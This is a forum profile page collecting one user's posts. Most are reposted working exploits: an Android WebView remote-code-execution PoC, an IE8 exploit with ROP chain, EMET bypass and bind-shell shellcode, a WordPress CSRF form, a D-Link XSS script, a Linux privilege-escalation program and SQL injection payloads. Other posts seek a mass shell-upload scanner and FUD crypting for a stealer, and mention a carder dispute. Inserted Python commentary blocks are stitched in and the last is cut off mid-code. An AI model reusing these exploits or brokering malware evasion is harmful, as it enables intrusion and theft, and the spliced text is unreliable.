sensi
Active Members
  • Posts: 574
  • Joined
  • Last visited
  • Days Won: 3

Everything posted by sensi

  1. If I had known you were the piece of garbage (the carder) I refunded the $50 to, I wouldn't have bothered with you at all. How would I generate 500k emails, you blockhead? When you connected over TV and saw the emails they were fine, weren't they? Now that you didn't catch anything by promoting your "" site (not to call it a scam) you've come to play dumb? When I get home we'll try to sort out the problem, but it's rather difficult with you. Anyway, I no longer have the money, so don't count on a refund (like last time). Excuse any grammatical mistakes, it's awkward from the phone and the battery is dead.
  2. @marius4fun25, I don't use ICQ, I sent you a PM with my Jabber. -- Up!
  3. <!--
.:: Remote code execution vulnerability in Boat Browser ::.
credit: c0otlass
social contact: https://twitter.com/c0otlass
mail: c0otlass@gmail.com
CVE reserved: CVE-2014-4968
time of discovery: July 14, 2014
Browser official site: http://www.boatmob.com/
Browser download link: https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en
Version affected: 8.0 and 8.0.1 tested, Android 3.0 through 4.1.x
Risk rate: High

Vulnerability description / impact:
The WebView class and the use of the WebView.addJavascriptInterface method have a vulnerability that lets remote code in an HTML page run on the Android device; a related issue is CVE-2012-6636.

proof of concept:
//.............................................. poc.html ............................................
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>CreatMalTxt POC - WebView</title>
<script>
function TestVulnerability() {
  var temp = "not";
  var myObject = window;
  // Walk every property the page can see; any object injected through
  // addJavascriptInterface exposes getClass(), which reflection turns into java.lang.Runtime
  for (var name in myObject) {
    if (myObject.hasOwnProperty(name)) {
      try {
        temp = myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null);
      } catch (e) {
      }
    }
  }
  if (temp == "not") {
    document.getElementById("log").innerHTML = "this browser has been patched";
  } else {
    document.getElementById("log").innerHTML = "This browser is exploitable" + "<br>" + "the poc file has been created in sdcard ...<br>";
    document.getElementById("log").innerHTML += "we could see process information" + temp.exec(['/system/bin/sh', '-c', 'echo "mwr" > /mnt/sdcard/mwr.txt']);
  }
}
</script>
</head>
<body>
<h3>CreatMalTxt POC</h3>
<input value="Test Vulnerability" type="button" onclick="TestVulnerability();" />
<div id="log"></div>
</body>
</html>
<!--
Solution:
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
http://www.programering.com/a/MDM3YzMwATc.html
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614

References:
http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/
https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
http://50.56.33.56/blog/?p=314
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py
-->
source
  4. Even if the vBulletin people don't deserve the report, your gesture should be appreciated. Congratulations! // How long did it take you to find the 0day? Plt, you didn't tell anyone there's still a vBulletin 5 on the server, we'd have joined in too.
  5. Hi, I'm looking for something (shell scanner/exploit/crawler) I can use to get hold of shells, and here I mean a larger "quantity". I was thinking of a script that finds SQLi-vulnerable sites via dorks and uploads a shell through INTO OUTFILE, or some other more ingenious method, so to speak. I know there's an exploit for WordPress (an older version). Those who own such a "scanner", or whatever you want to call it, please contact me with an ID and the agreed price.
  6. <!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass
** Offensive Security Research Team
** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed"><col id="132" width="41" span="9"></col></table>
<script language='javascript'>
function strtoint(str) {
  // two UTF-16 code units read back as a little-endian DWORD
  return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

var free = "EEEE";
while (free.length < 500) free += free;
var string1 = "AAAA";
while (string1.length < 500) string1 += string1;
var string2 = "BBBB";
while (string2.length < 500) string2 += string2;

var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";

// Groom the heap: 0x100-byte string allocations interleaved with CButtonLayout objects
for (var i = 0; i < 500; i += 2) {
  fr[i] = free.substring(0, (0x100-6)/2);
  al[i] = string1.substring(0, (0x100-6)/2);
  bl[i] = string2.substring(0, (0x100-6)/2);
  var obj = document.createElement("button");
  div_container.appendChild(obj);
}
for (var i = 200; i < 500; i += 2) {
  fr[i] = null;
  CollectGarbage();
}

function heapspray(cbuttonlayout) {
  CollectGarbage();
  // Each gadget is rebased on the leaked CButtonLayout address, then the hex string is
  // split into low word (chars 4-8) and high word (chars 0-4) for unescape()
  var rop = (cbuttonlayout + 4161).toString(16);        // RET
  var rop1 = rop.substring(4,8), rop2 = rop.substring(0,4);
  var rop = (cbuttonlayout + 11360).toString(16);       // POP EBP # RETN
  var rop3 = rop.substring(4,8), rop4 = rop.substring(0,4);
  var rop = (cbuttonlayout + 111675).toString(16);      // XCHG EAX,ESP # RETN
  var rop5 = rop.substring(4,8), rop6 = rop.substring(0,4);
  var rop = (cbuttonlayout + 12377).toString(16);       // POP EBX # RETN
  var rop7 = rop.substring(4,8), rop8 = rop.substring(0,4);
  var rop = (cbuttonlayout + 642768).toString(16);      // POP EDX # RETN
  var rop9 = rop.substring(4,8), rop10 = rop.substring(0,4);
  var rop = (cbuttonlayout + 12201).toString(16);       // POP ECX # RETN (changed)
  var rop11 = rop.substring(4,8), rop12 = rop.substring(0,4);
  var rop = (cbuttonlayout + 5504544).toString(16);     // Writable location
  var writable1 = rop.substring(4,8), writable2 = rop.substring(0,4);
  var rop = (cbuttonlayout + 12462).toString(16);       // POP EDI # RETN
  var rop13 = rop.substring(4,8), rop14 = rop.substring(0,4);
  var rop = (cbuttonlayout + 12043).toString(16);       // POP ESI # RETN (changed)
  var rop15 = rop.substring(4,8), rop16 = rop.substring(0,4);
  var rop = (cbuttonlayout + 63776).toString(16);       // JMP EAX
  var jmpeax1 = rop.substring(4,8), jmpeax2 = rop.substring(0,4);
  var rop = (cbuttonlayout + 85751).toString(16);       // POP EAX # RETN
  var rop17 = rop.substring(4,8), rop18 = rop.substring(0,4);
  var rop = (cbuttonlayout + 4936).toString(16);        // VirtualProtect()
  var vp1 = rop.substring(4,8), vp2 = rop.substring(0,4);
  var rop = (cbuttonlayout + 454843).toString(16);      // MOV EAX,DWORD PTR DS:[EAX] # RETN
  var rop19 = rop.substring(4,8), rop20 = rop.substring(0,4);
  var rop = (cbuttonlayout + 234657).toString(16);      // PUSHAD # RETN
  var rop21 = rop.substring(4,8), rop22 = rop.substring(0,4);
  var rop = (cbuttonlayout + 408958).toString(16);      // PUSH ESP # RETN
  var rop23 = rop.substring(4,8), rop24 = rop.substring(0,4);
  var rop = (cbuttonlayout + 2228408).toString(16);     // POP ECX # RETN
  var rop25 = rop.substring(4,8), rop26 = rop.substring(0,4);
  var rop = (cbuttonlayout + 1586172).toString(16);     // POP EAX # RETN
  var rop27 = rop.substring(4,8), rop28 = rop.substring(0,4);
  var rop = (cbuttonlayout + 1589179).toString(16);     // MOV EAX,DWORD PTR [EAX] # RETN
  var rop29 = rop.substring(4,8), rop30 = rop.substring(0,4);
  var rop = (cbuttonlayout + 1884912).toString(16);     // PUSH EAX # RETN
  var rop31 = rop.substring(4,8), rop32 = rop.substring(0,4);
  var rop = (cbuttonlayout + 2140694).toString(16);     // ADD EAX,ECX # RETN
  var rop33 = rop.substring(4,8), rop34 = rop.substring(0,4);
  var rop = (cbuttonlayout + 2364867).toString(16);     // MOV DWORD PTR [EAX],ECX # RETN
  var rop35 = rop.substring(4,8), rop36 = rop.substring(0,4);
  var rop = (cbuttonlayout + 5036248).toString(16);     // ADD ESP,0C # RETN
  var rop37 = rop.substring(4,8), rop38 = rop.substring(0,4);
  var getmodulew = (cbuttonlayout + 4840).toString(16); // GetModuleHandleW
  var getmodulew1 = getmodulew.substring(4,8), getmodulew2 = getmodulew.substring(0,4);
  var getprocaddr = (cbuttonlayout + 4836).toString(16); // GetProcAddress
  var getprocaddr1 = getprocaddr.substring(4,8), getprocaddr2 = getprocaddr.substring(0,4);

  var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
  shellcode += unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
  shellcode += unescape("%u4141%u4141"); // PADDING
  shellcode += unescape("%u"+rop1+"%u"+rop2);   // RETN
  shellcode += unescape("%u"+rop3+"%u"+rop4);   // POP EBP # RETN
  shellcode += unescape("%u"+rop5+"%u"+rop6);   // XCHG EAX,ESP # RETN

  // EMET disable part 0x01
  // Implement the Tachyon detection grid to overcome the Romulan cloaking device.
  shellcode += unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
  shellcode += unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
  shellcode += unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
  shellcode += unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
  shellcode += unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
  shellcode += unescape("%u101C%u076d"); // EMET string
  shellcode += unescape("%ue220%u0007"); // EMET offset
  shellcode += unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
  shellcode += unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
  shellcode += unescape("%u0000%u0000"); // Zero out ECX
  shellcode += unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
  shellcode += unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN
  shellcode += "EMET"; // EMET string
  shellcode += unescape("%u0000%u0000"); // EMET string
  // EMET disable part 0x01 end

  // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
  shellcode += unescape("%u"+rop3+"%u"+rop4);   // POP EBP
  shellcode += unescape("%u"+rop3+"%u"+rop4);   // POP EBP
  shellcode += unescape("%u"+rop7+"%u"+rop8);   // POP EBX
  shellcode += unescape("%u1024%u0000"); // Size 0x00001024
  shellcode += unescape("%u"+rop9+"%u"+rop10);  // POP EDX
  shellcode += unescape("%u0040%u0000"); // 0x00000040
  shellcode += unescape("%u"+rop11+"%u"+rop12); // POP ECX
  shellcode += unescape("%u"+writable1+"%u"+writable2); // Writable Location
  shellcode += unescape("%u"+rop13+"%u"+rop14); // POP EDI
  shellcode += unescape("%u"+rop1+"%u"+rop2);   // RET
  shellcode += unescape("%u"+rop15+"%u"+rop16); // POP ESI
  shellcode += unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
  shellcode += unescape("%u"+rop17+"%u"+rop18); // POP EAX
  shellcode += unescape("%u"+vp1+"%u"+vp2);     // VirtualProtect()
  shellcode += unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
  shellcode += unescape("%u"+rop21+"%u"+rop22); // PUSHAD
  shellcode += unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
  shellcode += unescape("%u9090%u9090"); // NOPs

  // EMET disable part 0x02
  // Execute the Corbomite bluff to disarm EAF
  shellcode += unescape("%uc0b8%u6d10");
  shellcode += unescape("%u8b07%u8b00");
  shellcode += unescape("%u6800%u10c8");
  shellcode += unescape("%u076d%ud0ff");
  shellcode += unescape("%ud468%u6d10");
  shellcode += unescape("%u5007%uc4b8");
  shellcode += unescape("%u6d10%u8b07");
  shellcode += unescape("%u8b00%uff00");
  shellcode += unescape("%u8bd0%u81f0");
  shellcode += unescape("%uccec%u0002");
  shellcode += unescape("%uc700%u2404");
  shellcode += unescape("%u0010%u0001");
  shellcode += unescape("%ufc8b%uccb9");
  shellcode += unescape("%u0002%u8300");
  shellcode += unescape("%u04c7%ue983");
  shellcode += unescape("%u3304%uf3c0");
  shellcode += unescape("%u54aa%ufe6a");
  shellcode += unescape("%ud6ff%u9090");
  shellcode += unescape("%u9090%u9090"); // NOPs
  shellcode += unescape("%u9090%u29eb"); // NOPs
  shellcode += unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
  shellcode += unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress
  shellcode += "NTDLL";
  shellcode += unescape("%u0000");
  shellcode += unescape("%u744e%u6553"); // NtSetContextThread
  shellcode += unescape("%u4374%u6e6f");
  shellcode += unescape("%u6574%u7478");
  shellcode += unescape("%u6854%u6572");
  shellcode += unescape("%u6461%u0000");
  shellcode += unescape("%u9090%u9090"); // NOPs
  shellcode += unescape("%u9090%u9090"); // NOPs
  // EMET disable part 0x02 end

  // Bind shellcode on 4444
  // msf > generate -t js_le
  // windows/shell_bind_tcp - 342 bytes
  // http://www.metasploit.com
  // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
  // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
  // I would keep the shellcode the same size for better reliability
  shellcode += unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
    "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
    "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
    "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
    "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
    "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
    "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
    "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
    "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
    "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
    "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
    "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
    "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
    "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
    "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
    "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
    "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
    "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
    "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
    "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
    "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
    "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
    "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
    "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
    "%u006a%uff53%u41d5");

  // Total spray should be 1000
  var padding = unescape("%u9090");
  while (padding.length < 1000) padding = padding + padding;
  var padding = padding.substr(0, 1000 - shellcode.length);
  shellcode += padding;
  while (shellcode.length < 100000) shellcode = shellcode + shellcode;
  var onemeg = shellcode.substr(0, 64*1024/2);
  for (i = 0; i < 14; i++) {
    onemeg += shellcode.substr(0, 64*1024/2);
  }
  onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
  var spray = new Array();
  for (i = 0; i < 100; i++) {
    spray[i] = onemeg.substr(0, onemeg.length);
  }
}

function leak() {
  var leak_col = document.getElementById("132");
  leak_col.width = "41";
  leak_col.span = "19";
}

function get_leak() {
  // read the overwritten string length / pointer out of an adjacent "BBBB" string
  var str_addr = strtoint(bl[498].substring((0x100-6)/2+11, (0x100-6)/2+13));
  str_addr = str_addr - 1410704;
  var hex = str_addr.toString(16);
  //alert(hex);
  setTimeout(function(){heapspray(str_addr)}, 50);
}

function trigger_overflow() {
  var evil_col = document.getElementById("132");
  evil_col.width = "1245880";
  evil_col.span = "44";
}

setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()}, 450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>
source // Yes, you're right, I hadn't seen it... actually the title isn't really suggestive either. I ask a moderator to move/delete the topic.
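The exploit above spends most of heapspray() converting rebased gadget addresses into the "%uXXXX%uXXXX" form that unescape() lays out in memory, and get_leak() reverses the same encoding with strtoint(). The block below is an added example by the editor, not part of the Offensive Security exploit: it reproduces that encoding and decoding in Python so the byte order can be checked offline. The gadget offsets are the exploit's; the leaked base address is a constructed sample value, and the zero-padding (which the exploit's toString(16).substring() trick lacks for addresses below 0x10000000) is an addition.

```python
# Added example (not part of the original exploit): how the IE8 exploit turns a
# leaked CButtonLayout address into the "%uXXXX%uXXXX" words it sprays, and how
# strtoint() recovers a DWORD from two UTF-16 code units.
import re
import struct

# Gadget offsets copied from the exploit's heapspray(): (offset from the leaked
# CButtonLayout address, comment). Only the first few are listed here.
GADGETS = [
    (4161, "RETN"),
    (11360, "POP EBP # RETN"),
    (111675, "XCHG EAX,ESP # RETN"),
    (4936, "VirtualProtect() IAT entry"),
]

def strtoint(s):
    """Mirror of the exploit's strtoint(): two UTF-16 code units -> little-endian DWORD."""
    return ord(s[1]) * 0x10000 + ord(s[0])

def dword_to_unescape(value):
    """Encode a 32-bit value the way unescape('%ulow%uhigh') lays it out in memory
    (low 16 bits first). Unlike rop.toString(16).substring(4,8) in the exploit,
    this zero-pads, so it is also correct for addresses below 0x10000000."""
    value &= 0xFFFFFFFF
    return "%%u%04x%%u%04x" % (value & 0xFFFF, value >> 16)

def unescape_to_bytes(encoded):
    """Expand a %uXXXX string to the raw little-endian bytes IE would place in the heap."""
    out = b""
    for unit in re.findall(r"%u([0-9a-fA-F]{4})", encoded):
        out += struct.pack("<H", int(unit, 16))
    return out

def build_chain(base, gadgets=GADGETS):
    """Rebase every gadget on the leaked address and return (encoded, raw_bytes)."""
    encoded = "".join(dword_to_unescape(base + off) for off, _ in gadgets)
    return encoded, unescape_to_bytes(encoded)

def decode_chain(raw):
    """Read the chain back as DWORDs, i.e. what the CPU pops during the ROP sequence."""
    return [struct.unpack_from("<I", raw, i)[0] for i in range(0, len(raw), 4)]

if __name__ == "__main__":
    leaked = 0x6d070000  # constructed sample base, not a real leak
    enc, raw = build_chain(leaked)
    print(enc)
    print([hex(v) for v in decode_chain(raw)])
```

The round trip build_chain -> decode_chain is the check worth running whenever a chain is rebased: if the decoded DWORDs are not base + offset, the low and high words were swapped somewhere.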
  7. UP! $456.34 (0.78026254) BTC -> PP/bank transfer.
  8. Selling 1,130.64 RON (0.61728395) Bitcoin, bank transfer or PP.
  9. The archive is "corrupted". // I hadn't seen it, sorry.
  10. Hi, does anyone still offer "crypting" services? I want to crypt a stealer FUD, so that it holds for at least 3 days. Whoever can help me, please contact me via PM.
  11. Maintenance and development of the forum. This subject has been brought up before... // I posted at the same time as alexandruth
  12. # EXPLOIT TITLE: Wordpress 3.9.1 - CSRF vulnerability
# DATE: 21st June, 2014
# Author: Avinash Kumar Thapa
# URL: localhost/wordpress/
# PATCH/FIX: Not fixed yet.
###################################################################################################
Technical Details:
This is the new version released by Wordpress. version is 3.9.1 (Latest)
## Cross site request Forgery (CSRF) is present in this version at the url shown: http://localhost/wordpress/wp-comments-post.php ##
#####################################################################################################
Exploit Code:
<html>
<!-- CSRF PoC - generated by **Avinash Kumar Thapa** -->
<body>
<form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
  <input type="hidden" name="author" value="Anonymous" />
  <input type="hidden" name="email" value="helloworld@outlook.com" />
  <input type="hidden" name="url" value="www.random.com" />
  <input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
  <input type="hidden" name="submit" value="Post Comment" />
  <input type="hidden" name="comment_post_ID" value="1" />
  <input type="hidden" name="comment_parent" value="0" />
  <input type="submit" value="Submit form" />
</form>
</body>
</html>
###########################################################################################################
----
-- Avinash a.k.a **SPID3R**
twitter: @m_avinash143 <https://twitter.com/m_avinash143>
source
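The PoC above works because the form carries nothing an attacker's page could not guess. The block below is an added example by the editor, not WordPress code and not part of the advisory: a synchronizer-token check of the kind that makes a cross-site form post fail, with the token bound to the session and the form action through an HMAC. The secret key, the session id and the request dictionaries are constructed sample values; handle_comment_post() is a hypothetical stand-in for wp-comments-post.php.

```python
# Added example (not WordPress code): a synchronizer-token check that defeats the
# one-shot HTML form in the PoC above. The token is an HMAC over the session id and
# the form action, so an attacker's page cannot forge it without reading the
# victim's session. SECRET_KEY and the session id are constructed sample values.
import hashlib
import hmac

SECRET_KEY = b"constructed-server-secret-rotate-me"

def issue_csrf_token(session_id, action, secret=SECRET_KEY):
    """Token a form renders in a hidden field; bound to this session and this action."""
    msg = ("%s|%s" % (session_id, action)).encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()

def verify_csrf_token(session_id, action, presented, secret=SECRET_KEY):
    """Constant-time compare; a missing or foreign token fails closed."""
    if not presented or not isinstance(presented, str):
        return False
    expected = issue_csrf_token(session_id, action, secret)
    return hmac.compare_digest(expected, presented)

def handle_comment_post(session_id, form):
    """Hypothetical stand-in for wp-comments-post.php: reject unless the token verifies."""
    if not verify_csrf_token(session_id, "wp-comments-post", form.get("_csrf")):
        return (403, "CSRF token missing or invalid")
    return (200, "comment by %s accepted" % form.get("author", "anonymous"))

# Constructed requests: the PoC form (no token) and a legitimate one with a token.
POC_FORM = {"author": "Anonymous", "comment": "Cross site request Forgery(CSRF)",
            "comment_post_ID": "1", "comment_parent": "0"}

def demo(session_id="sess-constructed-1234"):
    legit = dict(POC_FORM, _csrf=issue_csrf_token(session_id, "wp-comments-post"))
    return handle_comment_post(session_id, POC_FORM), handle_comment_post(session_id, legit)

if __name__ == "__main__":
    print(demo())
```

Binding the token to the action as well as the session means a token leaked from one form (say, a search box) cannot be replayed against the comment endpoint.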
  13. #!/bin/bash
# Written and discovered by Yuval tisf Nativ
# The page 'dhcpinfo.html' will list all machines connected to the network with hostname,
# IP, MAC and IP expiration. It is possible to store an XSS in this table by changing hostname.

# Checks if you are root
if [ "$(id -u)" != "0" ]; then
    echo "Please execute this script as root"
    exit 1
fi

# Your XSS here
xss="\"<script>alert('pwned');</script>"

# backup current hostname
currhost=$(hostname)

# Bannering
echo ""
echo " D-Link Persistent XSS by tisf"
echo ""
echo "The page dhcpinfo.html is the vulnerable page."
echo "Ask the user to access it and your persistent XSS will be triggered."
echo ""

# Change hostname to XSS
hostname "$xss"

# Restore previous hostname on exit
read -r -n 1 -p "Press any key to exit and restore your previous hostname."
hostname "$currhost"
source
  14. /**
 * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
 *
 * Vitaly Nikolenko
 * http://hashcrack.org
 *
 * Usage: ./poc [file_path]
 *
 * where file_path is the file on which you want to set the sgid bit
 */
#define _GNU_SOURCE
#include <sys/wait.h>
#include <sys/stat.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <assert.h>

#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];

struct args {
    int pipe_fd[2];
    char *file_path;
};

static int child(void *arg)
{
    struct args *f_args = (struct args *)arg;
    char c;

    /* close the write end; read() then blocks until the parent has written
       uid_map and closed its own write end */
    close(f_args->pipe_fd[1]);
    assert(read(f_args->pipe_fd[0], &c, 1) == 0);

    /* set the setgid bit (we are uid 0 inside the new user namespace) */
    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
    return 0;
}

int main(int argc, char *argv[])
{
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;

    assert(argc == 2);
    f_args.file_path = argv[1];

    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);

    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
    assert(pid != -1);

    // map uid 0 inside the namespace to the current uid outside it
    snprintf(mapping, 1024, "0 %d 1\n", getuid());

    // update the uid map of the child
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR);
    assert(fd != -1);
    assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
    close(fd);

    // closing the write end releases the child from its read()
    close(f_args.pipe_fd[1]);
    assert(waitpid(pid, NULL, 0) != -1);
    return 0;
}
source
  15. Advisory ID: HTB23213
Product: web2Project
Vendor: http://web2project.net
Vulnerable Version(s): 3.1 and probably prior
Tested Version: 3.1
Advisory Publication: April 30, 2014 [without technical details]
Vendor Notification: April 30, 2014
Vendor Patch: May 1, 2014
Public Disclosure: June 18, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-3119
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web2Project, which can be exploited to perform SQL Injection attacks and gain complete access to the vulnerable website.

1) SQL Injection in web2Project: CVE-2014-3119

1.1 The vulnerability exists due to insufficient sanitization of the "search_string" HTTP POST parameter passed to the "/index.php" script. A remote authenticated user with privileges to access the "contacts" module can inject and execute arbitrary SQL commands in the application's database and e.g. create, alter and delete information, or gain unauthorized access to the vulnerable website.

The following exploitation example displays the version of the MySQL Server:

<form action="http://[host]/index.php?m=contacts" method="post" name="main">
<input type="hidden" name="search_string" value="'and(select 1 from(select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'">
<input type="submit" id="btn">
</form>

1.2 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP POST parameter passed to "/do_updatecontact.php". This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

A remote unauthenticated attacker can inject and execute arbitrary SQL commands in the application's database and e.g. create, alter and delete information, or gain unauthorized access to the vulnerable website.

The following exploitation example writes the word "immuniweb" into the file "file.txt", depending on MySQL configuration and filesystem permissions:

<form action="http://[host]/do_updatecontact.php" method="post" name="main">
<input type="hidden" name="updatekey" value="' UNION SELECT 'immuniweb' INTO OUTFILE 'file.txt' -- ">
<input type="submit" id="btn">
</form>

1.3 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP GET parameter passed to the "/updatecontact.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

A remote unauthenticated attacker can inject and execute arbitrary SQL commands in the application's database and e.g. create, alter and delete information, or gain unauthorized access to the vulnerable website.

The following exploitation example writes the word "immuniweb" into the file "file.txt", depending on MySQL configuration and filesystem permissions:

<form action="http://[host]/updatecontact.php" method="get" name="main">
<input type="hidden" name="updatekey" value="' UNION SELECT 'immuniweb' INTO OUTFILE 'file.txt' -- ">
<input type="submit" id="btn">
</form>

Successful exploitation of the vulnerabilities can grant an attacker unrestricted access to the website and its database.

-----------------------------------------------------------------------------------------------

Solution:

Apply vendor fixes:
https://github.com/web2project/web2project/commit/eead99b36f62a8222d9f3a913f1a2268200687ef
https://github.com/web2project/web2project/commit/ab5ba92a6aaf0435cd0b2132cf7f9b7b41575a28

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23213 - https://www.htbridge.com/advisory/HTB23213 - Multiple SQL Injection Vulnerabilities in web2Project.
[2] web2Project - http://web2project.net/ - web2Project is a Free Open Source business-oriented Project Management System (PMS) built for the future.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
source
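The advisory's three findings share one root cause: a request parameter is concatenated into the query text. The block below is an added example by the editor, not web2Project code: a search over an in-memory SQLite table written both ways, so the injected UNION that pulls the database version (the advisory's 1.1 does the same against MySQL with an error-based payload, which SQLite does not support) can be seen to work against the concatenated query and to be treated as plain data by the parameterised one. The table, rows and column names are constructed stand-ins for the contacts module, not its real schema.

```python
# Added example (not web2Project code): the search_string injection reproduced
# against an in-memory SQLite table, next to a parameterised query that neutralises
# it. Table, rows and query shape are constructed stand-ins, not the real schema.
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE contacts (contact_id INTEGER, contact_first_name TEXT, contact_email TEXT)")
    db.executemany("INSERT INTO contacts VALUES (?, ?, ?)",
                   [(1, "alice", "alice@example.test"), (2, "bob", "bob@example.test")])
    return db

def search_contacts_vulnerable(db, search_string):
    """String concatenation: the pattern the advisory describes (CWE-89)."""
    sql = ("SELECT contact_first_name FROM contacts WHERE contact_first_name LIKE '%"
           + search_string + "%'")
    return [row[0] for row in db.execute(sql)]

def search_contacts_fixed(db, search_string):
    """Bound parameter: whatever the input contains, it is only ever compared as data."""
    sql = "SELECT contact_first_name FROM contacts WHERE contact_first_name LIKE ?"
    return [row[0] for row in db.execute(sql, ("%" + search_string + "%",))]

# Constructed payloads in the spirit of the advisory: close the quote, append SQL,
# comment out the trailing %'.
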